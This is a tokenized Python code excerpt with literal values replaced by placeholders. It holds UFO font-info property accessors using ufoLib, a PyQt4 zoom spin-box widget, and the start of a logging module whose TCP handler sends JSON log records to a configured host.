repr ( value ) ) <EOL> else : <EOL> self . _postscriptSlantAngle = value <EOL> self . dirty = True <EOL> postscriptSlantAngle = property ( _get_postscriptSlantAngle , _set_postscriptSlantAngle , doc = "<STR_LIT>" ) <EOL> def _get_postscriptStemSnapH ( self ) : <EOL> if self . _postscriptStemSnapH is None : <EOL> return [ ] <EOL> return self . _postscriptStemSnapH <EOL> def _set_postscriptStemSnapH ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptStemSnapH = None <EOL> else : <EOL> valid = ufoLib . 
validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptStemSnapH = value <EOL> self . dirty = True <EOL> postscriptStemSnapH = property ( _get_postscriptStemSnapH , _set_postscriptStemSnapH , doc = "<STR_LIT>" ) <EOL> def _get_postscriptStemSnapV ( self ) : <EOL> if self . _postscriptStemSnapV is None : <EOL> return [ ] <EOL> return self . _postscriptStemSnapV <EOL> def _set_postscriptStemSnapV ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptStemSnapV = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptStemSnapV = value <EOL> self . dirty = True <EOL> postscriptStemSnapV = property ( _get_postscriptStemSnapV , _set_postscriptStemSnapV , doc = "<STR_LIT>" ) <EOL> def _get_postscriptUnderlinePosition ( self ) : <EOL> return self . _postscriptUnderlinePosition <EOL> def _set_postscriptUnderlinePosition ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptUnderlinePosition = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptUnderlinePosition = value <EOL> self . dirty = True <EOL> postscriptUnderlinePosition = property ( _get_postscriptUnderlinePosition , _set_postscriptUnderlinePosition , doc = "<STR_LIT>" ) <EOL> def _get_postscriptUnderlineThickness ( self ) : <EOL> return self . _postscriptUnderlineThickness <EOL> def _set_postscriptUnderlineThickness ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptUnderlineThickness = None <EOL> else : <EOL> valid = ufoLib . 
validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptUnderlineThickness = value <EOL> self . dirty = True <EOL> postscriptUnderlineThickness = property ( _get_postscriptUnderlineThickness , _set_postscriptUnderlineThickness , doc = "<STR_LIT>" ) <EOL> def _get_postscriptUniqueID ( self ) : <EOL> return self . _postscriptUniqueID <EOL> def _set_postscriptUniqueID ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptUniqueID = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptUniqueID = value <EOL> self . dirty = True <EOL> postscriptUniqueID = property ( _get_postscriptUniqueID , _set_postscriptUniqueID , doc = "<STR_LIT>" ) <EOL> def _get_postscriptWeightName ( self ) : <EOL> return self . _postscriptWeightName <EOL> def _set_postscriptWeightName ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptWeightName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptWeightName = value <EOL> self . dirty = True <EOL> postscriptWeightName = property ( _get_postscriptWeightName , _set_postscriptWeightName , doc = "<STR_LIT>" ) <EOL> def _get_postscriptWindowsCharacterSet ( self ) : <EOL> return self . _postscriptWindowsCharacterSet <EOL> def _set_postscriptWindowsCharacterSet ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptWindowsCharacterSet = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . 
_postscriptWindowsCharacterSet = value <EOL> self . dirty = True <EOL> postscriptWindowsCharacterSet = property ( _get_postscriptWindowsCharacterSet , _set_postscriptWindowsCharacterSet , doc = "<STR_LIT>" ) <EOL> def _get_styleMapFamilyName ( self ) : <EOL> return self . _styleMapFamilyName <EOL> def _set_styleMapFamilyName ( self , value ) : <EOL> if value is None : <EOL> self . _styleMapFamilyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _styleMapFamilyName = value <EOL> self . dirty = True <EOL> styleMapFamilyName = property ( _get_styleMapFamilyName , _set_styleMapFamilyName , doc = "<STR_LIT>" ) <EOL> def _get_styleMapStyleName ( self ) : <EOL> return self . _styleMapStyleName <EOL> def _set_styleMapStyleName ( self , value ) : <EOL> if value is None : <EOL> self . _styleMapStyleName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _styleMapStyleName = value <EOL> self . dirty = True <EOL> styleMapStyleName = property ( _get_styleMapStyleName , _set_styleMapStyleName , doc = "<STR_LIT>" ) <EOL> def _get_styleName ( self ) : <EOL> return self . _styleName <EOL> def _set_styleName ( self , value ) : <EOL> if value is None : <EOL> self . _styleName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _styleName = value <EOL> self . dirty = True <EOL> styleName = property ( _get_styleName , _set_styleName , doc = "<STR_LIT>" ) <EOL> def _get_trademark ( self ) : <EOL> return self . _trademark <EOL> def _set_trademark ( self , value ) : <EOL> if value is None : <EOL> self . 
_trademark = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _trademark = value <EOL> self . dirty = True <EOL> trademark = property ( _get_trademark , _set_trademark , doc = "<STR_LIT>" ) <EOL> def _get_unitsPerEm ( self ) : <EOL> return self . _unitsPerEm <EOL> def _set_unitsPerEm ( self , value ) : <EOL> if value is None : <EOL> self . _unitsPerEm = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _unitsPerEm = value <EOL> self . dirty = True <EOL> unitsPerEm = property ( _get_unitsPerEm , _set_unitsPerEm , doc = "<STR_LIT>" ) <EOL> def _get_versionMajor ( self ) : <EOL> return self . _versionMajor <EOL> def _set_versionMajor ( self , value ) : <EOL> if value is None : <EOL> self . _versionMajor = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _versionMajor = value <EOL> self . dirty = True <EOL> versionMajor = property ( _get_versionMajor , _set_versionMajor , doc = "<STR_LIT>" ) <EOL> def _get_versionMinor ( self ) : <EOL> return self . _versionMinor <EOL> def _set_versionMinor ( self , value ) : <EOL> if value is None : <EOL> self . _versionMinor = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _versionMinor = value <EOL> self . dirty = True <EOL> versionMinor = property ( _get_versionMinor , _set_versionMinor , doc = "<STR_LIT>" ) <EOL> def _get_xHeight ( self ) : <EOL> return self . 
_xHeight <EOL> def _set_xHeight ( self , value ) : <EOL> if value is None : <EOL> self . _xHeight = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _xHeight = value <EOL> self . dirty = True <EOL> xHeight = property ( _get_xHeight , _set_xHeight , doc = "<STR_LIT>" ) <EOL> def _get_year ( self ) : <EOL> return self . _year <EOL> def _set_year ( self , value ) : <EOL> if value is None : <EOL> self . _year = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _year = value <EOL> self . dirty = True <EOL> year = property ( _get_year , _set_year , doc = "<STR_LIT>" ) <EOL> def _get_createdBy ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_createdBy ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> createdBy = property ( _get_createdBy , _set_createdBy ) <EOL> def _get_defaultWidth ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_defaultWidth ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> defaultWidth = property ( _get_defaultWidth , _set_defaultWidth ) <EOL> def _get_designer ( self ) : <EOL> newAttr , n = ufoLib . 
convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_designer ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> designer = property ( _get_designer , _set_designer ) <EOL> def _get_designerURL ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_designerURL ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> designerURL = property ( _get_designerURL , _set_designerURL ) <EOL> def _get_fondID ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_fondID ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> fondID = property ( _get_fondID , _set_fondID ) <EOL> def _get_fondName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_fondName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> fondName = property ( _get_fondName , _set_fondName ) <EOL> def _get_fontName ( self ) : <EOL> newAttr , n = ufoLib . 
convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_fontName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> fontName = property ( _get_fontName , _set_fontName ) <EOL> def _get_fontStyle ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_fontStyle ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> fontStyle = property ( _get_fontStyle , _set_fontStyle ) <EOL> def _get_fullName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_fullName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> fullName = property ( _get_fullName , _set_fullName ) <EOL> def _get_license ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_license ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> license = property ( _get_license , _set_license ) <EOL> def _get_licenseURL ( self ) : <EOL> newAttr , n = ufoLib . 
convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_licenseURL ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> licenseURL = property ( _get_licenseURL , _set_licenseURL ) <EOL> def _get_menuName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_menuName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> menuName = property ( _get_menuName , _set_menuName ) <EOL> def _get_msCharSet ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_msCharSet ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> msCharSet = property ( _get_msCharSet , _set_msCharSet ) <EOL> def _get_notice ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_notice ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> notice = property ( _get_notice , _set_notice ) <EOL> def _get_otFamilyName ( self ) : <EOL> newAttr , n = ufoLib . 
convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_otFamilyName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> otFamilyName = property ( _get_otFamilyName , _set_otFamilyName ) <EOL> def _get_otMacName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_otMacName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> otMacName = property ( _get_otMacName , _set_otMacName ) <EOL> def _get_otStyleName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_otStyleName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> otStyleName = property ( _get_otStyleName , _set_otStyleName ) <EOL> def _get_slantAngle ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_slantAngle ( self , value ) : <EOL> newAttr , newValue = ufoLib . 
convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> slantAngle = property ( _get_slantAngle , _set_slantAngle ) <EOL> def _get_ttUniqueID ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_ttUniqueID ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> ttUniqueID = property ( _get_ttUniqueID , _set_ttUniqueID ) <EOL> def _get_ttVendor ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_ttVendor ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> ttVendor = property ( _get_ttVendor , _set_ttVendor ) <EOL> def _get_ttVersion ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_ttVersion ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> ttVersion = property ( _get_ttVersion , _set_ttVersion ) <EOL> def _get_uniqueID ( self ) : <EOL> newAttr , n = ufoLib . 
convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_uniqueID ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> uniqueID = property ( _get_uniqueID , _set_uniqueID ) <EOL> def _get_vendorURL ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_vendorURL ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> vendorURL = property ( _get_vendorURL , _set_vendorURL ) <EOL> def _get_weightName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_weightName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> weightName = property ( _get_weightName , _set_weightName ) <EOL> def _get_weightValue ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_weightValue ( self , value ) : <EOL> newAttr , newValue = ufoLib . 
convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> weightValue = property ( _get_weightValue , _set_weightValue ) <EOL> def _get_widthName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_widthName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> widthName = property ( _get_widthName , _set_widthName ) <EOL> def getDataToSerializeForUndo ( self ) : <EOL> data = dict . fromkeys ( ufoLib . fontInfoAttributesVersion2 ) <EOL> for attr in data . keys ( ) : <EOL> data [ attr ] = getattr ( self , attr ) <EOL> return data <EOL> def loadDeserializedDataFromUndo ( self , data ) : <EOL> for attr , value in data . items ( ) : <EOL> if getattr ( self , attr ) == value : <EOL> continue <EOL> setattr ( self , attr , value ) </s>
<s> from PyQt4 . QtGui import * <EOL> from PyQt4 . QtCore import * <EOL> class ZoomWidget ( QSpinBox ) : <EOL> def __init__ ( self , value = <NUM_LIT:100> ) : <EOL> super ( ZoomWidget , self ) . __init__ ( ) <EOL> self . setButtonSymbols ( QAbstractSpinBox . NoButtons ) <EOL> self . setRange ( <NUM_LIT:1> , <NUM_LIT> ) <EOL> self . setSuffix ( '<STR_LIT>' ) <EOL> self . setValue ( value ) <EOL> self . setToolTip ( u'<STR_LIT>' ) <EOL> self . setStatusTip ( self . toolTip ( ) ) <EOL> self . setAlignment ( Qt . AlignCenter ) <EOL> def minimumSizeHint ( self ) : <EOL> height = super ( ZoomWidget , self ) . minimumSizeHint ( ) . height ( ) <EOL> fm = QFontMetrics ( self . font ( ) ) <EOL> width = fm . width ( str ( self . maximum ( ) ) ) <EOL> return QSize ( width , height ) </s>
<s> from traceback import format_exc <EOL> from datetime import datetime <EOL> from Queue import Queue <EOL> import threading <EOL> import logging <EOL> import socket <EOL> import json <EOL> import time <EOL> import ssl <EOL> LOG_QUEUE_SIZE = <NUM_LIT> <EOL> BACKOFF_INITIAL = <NUM_LIT:0.1> <EOL> BACKOFF_MULTIPLE = <NUM_LIT> <EOL> INTERNAL_LOG = logging . getLogger ( '<STR_LIT>' ) <EOL> class TCPHandler ( logging . Handler ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , host , port , ssl_ca_file = None ) : <EOL> '''<STR_LIT>''' <EOL> logging . Handler . __init__ ( self ) <EOL> self . host = host <EOL> self . port = port <EOL> self . ssl_ca_file = ssl_ca_file <EOL> self . sock = None <EOL> self . queue = Queue ( LOG_QUEUE_SIZE ) <EOL> self . connect_wait = BACKOFF_INITIAL <EOL> self . raiseExceptions = <NUM_LIT:0> <EOL> self . hostname = socket . gethostname ( ) <EOL> if self . hostname . find ( '<STR_LIT:.>' ) != - <NUM_LIT:1> : <EOL> self . hostname = self . hostname . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . sender = threading . Thread ( target = self . run ) <EOL> self . sender . setDaemon ( True ) <EOL> self . sender . start ( ) <EOL> def connect ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . sock = socket . socket ( ) <EOL> if self . ssl_ca_file : <EOL> self . sock = ssl . wrap_socket ( self . sock , <EOL> ssl_version = ssl . PROTOCOL_TLSv1 , <EOL> cert_reqs = ssl . CERT_REQUIRED , <EOL> ca_certs = self . ssl_ca_file ) <EOL> INTERNAL_LOG . debug ( '<STR_LIT>' % <EOL> self . connect_wait ) <EOL> time . sleep ( self . connect_wait ) <EOL> self . sock . connect ( ( self . host , self . port ) ) <EOL> def jsonify ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> timestamp = datetime . utcfromtimestamp ( record . created ) <EOL> timestamp = timestamp . isoformat ( ) <EOL> fields = { <EOL> '<STR_LIT>' : record . levelname , <EOL> '<STR_LIT:filename>' : record . pathname , <EOL> '<STR_LIT>' : record . lineno , <EOL> '<STR_LIT>' : record . 
funcName , <EOL> } <EOL> if record . exc_info : <EOL> fields [ '<STR_LIT>' ] = str ( record . exc_info ) <EOL> fields [ '<STR_LIT>' ] = format_exc ( record . exc_info ) <EOL> log = { <EOL> '<STR_LIT>' : self . hostname , <EOL> '<STR_LIT>' : timestamp , <EOL> '<STR_LIT>' : [ record . name ] , <EOL> '<STR_LIT>' : record . getMessage ( ) , <EOL> '<STR_LIT>' : fields , <EOL> } <EOL> return json . dumps ( log ) <EOL> def emit ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> self . queue . put_nowait ( record ) <EOL> def run ( self ) : <EOL> '''<STR_LIT>''' <EOL> INTERNAL_LOG . debug ( '<STR_LIT>' ) <EOL> while True : <EOL> record = self . queue . get ( ) <EOL> if record is None : <EOL> break <EOL> jsonrecord = self . jsonify ( record ) <EOL> jsonrecord = '<STR_LIT>' % jsonrecord <EOL> try : <EOL> if self . sock is None : <EOL> self . connect ( ) <EOL> self . send ( jsonrecord ) <EOL> except Exception : <EOL> self . queue . put ( record ) <EOL> self . handleError ( record ) <EOL> self . queue . task_done ( ) <EOL> INTERNAL_LOG . debug ( '<STR_LIT>' ) <EOL> def send ( self , data ) : <EOL> '''<STR_LIT>''' <EOL> while len ( data ) > <NUM_LIT:0> : <EOL> if self . ssl_ca_file : <EOL> sent = self . sock . write ( data ) <EOL> else : <EOL> sent = self . sock . send ( data ) <EOL> data = data [ sent : ] <EOL> self . connect_wait = BACKOFF_INITIAL <EOL> def handleError ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> INTERNAL_LOG . exception ( '<STR_LIT>' ) <EOL> self . cleanup ( ) <EOL> self . connect_wait *= BACKOFF_MULTIPLE <EOL> logging . Handler . handleError ( self , record ) <EOL> def cleanup ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . sock : <EOL> INTERNAL_LOG . info ( '<STR_LIT>' ) <EOL> self . sock . close ( ) <EOL> self . sock = None <EOL> def close ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . queue . put ( None ) <EOL> self . cleanup ( ) <EOL> class UDPHandler ( logging . 
